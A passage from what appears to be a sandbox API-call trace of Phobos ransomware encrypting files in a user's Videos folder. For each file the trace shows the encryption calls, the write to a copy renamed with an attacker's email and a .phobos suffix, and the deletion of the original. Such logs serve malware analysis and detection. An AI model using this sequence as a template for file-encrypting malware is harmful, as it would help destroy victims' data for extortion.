HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.607] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.607] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5e3d, lpOverlapped=0x0) returned 1 [0199.608] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5e40, dwBufLen=0x5e40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5e40) returned 1 [0199.609] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5e40, lpOverlapped=0x0) returned 1 [0199.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.610] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.610] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.610] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.610] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.610] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.610] CloseHandle (hObject=0x140) returned 1 [0199.610] CloseHandle (hObject=0x174) returned 1 [0199.610] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf")) returned 1 [0199.611] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.612] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=504) returned 1 [0199.612] CloseHandle (hObject=0x174) returned 1 [0199.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 0x26 [0199.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.613] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.613] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.613] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.613] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1f8, lpOverlapped=0x0) returned 1 [0199.614] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200, dwBufLen=0x200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200) returned 1 [0199.614] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x200, lpOverlapped=0x0) returned 1 [0199.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.615] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.615] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.615] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.615] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.615] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.615] CloseHandle (hObject=0x174) returned 1 [0199.615] CloseHandle (hObject=0x140) returned 1 [0199.615] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 1 [0199.616] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.619] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=61206) returned 1 [0199.619] CloseHandle (hObject=0xac) returned 1 [0199.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv")) returned 0x20 [0199.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.620] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.620] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.620] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.620] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.620] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xef16, lpOverlapped=0x0) returned 1 [0199.622] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xef20, dwBufLen=0xef20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xef20) returned 1 [0199.622] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xef20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xef20, lpOverlapped=0x0) returned 1 [0199.624] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0199.624] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.624] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0199.624] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.624] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0199.624] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.624] CloseHandle (hObject=0xac) returned 1 [0199.624] CloseHandle (hObject=0x160) returned 1 [0199.624] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gVOV_SE5Blg8N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gvov_se5blg8n.flv")) returned 1 [0199.626] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.626] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=71889) returned 1 [0199.626] CloseHandle (hObject=0x160) returned 1 [0199.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv")) returned 0x20 [0199.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.627] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.627] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.628] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.628] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.628] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x118d1, lpOverlapped=0x0) returned 1 [0199.630] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x118e0, dwBufLen=0x118e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x118e0) returned 1 [0199.630] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x118e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x118e0, lpOverlapped=0x0) returned 1 [0199.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0199.632] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.632] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.632] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.632] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.632] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.632] CloseHandle (hObject=0x160) returned 1 [0199.632] CloseHandle (hObject=0xac) returned 1 [0199.633] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HkmuqdG7gP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hkmuqdg7gp.flv")) returned 1 [0199.634] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.635] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=84581) returned 1 [0199.635] CloseHandle (hObject=0xac) returned 1 [0199.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi")) returned 0x20 [0199.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.635] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.635] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.636] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.636] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.636] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14a65, lpOverlapped=0x0) returned 1 [0199.857] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14a70, dwBufLen=0x14a70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14a70) returned 1 [0199.857] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x14a70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x14a70, lpOverlapped=0x0) returned 1 [0199.866] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0199.866] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.866] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.866] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.866] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.867] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.867] CloseHandle (hObject=0xac) returned 1 [0199.867] CloseHandle (hObject=0x160) returned 1 [0199.867] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Hlr3p3kxB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlr3p3kxb.avi")) returned 1 [0199.868] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.869] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=50653) returned 1 [0199.869] CloseHandle (hObject=0x160) returned 1 [0199.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi")) returned 0x20 [0199.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.869] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.869] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.870] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.870] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.870] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc5dd, lpOverlapped=0x0) returned 1 [0199.872] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc5e0, dwBufLen=0xc5e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc5e0) returned 1 [0199.872] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc5e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc5e0, lpOverlapped=0x0) returned 1 [0199.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0199.874] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.874] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.874] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.874] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, 